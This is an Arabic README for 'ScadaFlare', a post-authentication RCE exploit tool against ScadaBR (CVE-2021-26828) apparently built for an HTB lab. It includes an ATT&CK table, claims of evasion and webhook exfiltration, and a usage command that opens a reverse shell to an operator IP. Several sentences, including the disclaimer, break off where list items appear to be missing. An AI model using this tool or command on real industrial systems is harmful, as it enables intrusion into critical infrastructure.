
ScadaFlare إطار عمل استغلال RCE مصادق عليه لـ ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
أداة استغلال RCE معيارية بعد المصادقة تستهدف ScadaBR <1.1.0، معززة لعمليات الفريق الأحمر.

.jsp مسلّح عبر view_edit.shtm| المرحلة | التقنية | المعرف |
|---|---|---|
| الوصول الأولي (بعد المصادقة) | حسابات صالحة | T1078 |
| التنفيذ | استغلال تطبيق مواجه للجمهور | T1190 |
| تنفيذ الأوامر | شِل ويب | T1505.003 |
| إجراءات الامتيازات | تعديل محتوى الويب | T1505 |
| الوصول إلى بيانات الاعتماد | بيانات اعتماد في ملفات الإعدادات | T1552.001 |
| الاكتشاف | اكتشاف النظام البعيد | T1018 |
| استخراج البيانات | استخراج عبر خدمة ويب | T1567.002 |
| التخفي عن الدفاع | وكيل ونفق بروتوكول | T1090 |
تم تطوير هذه الأداة أثناء تحليل سيناريو مختبر HTB Pro: Alchemy. كانت الإثبات الأصلي (PoC) من قبل Fellipe Oliveira قويًا لكن:
هذا الإصدار، ScadaFlare، هو إعادة كتابة كاملة بلغة Python 3 مع دعم معياري، استراتيجيات تمويه متعددة، تجاوز كشف نظام التشغيل، تكامل webhook، دعم وكيل SOCKS، وسلاسل تعداد للاستخدام العملي للمشغلين.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare مصممة فقط من أجل:
الاستخدام غير المصرح به ضد الأنظمة الصناعية الحقيقية يمكن أن:
باستخدام هذه الأداة أنت تقبل المسؤولية الكاملة عن:
رخصة MIT – انظر LICENSE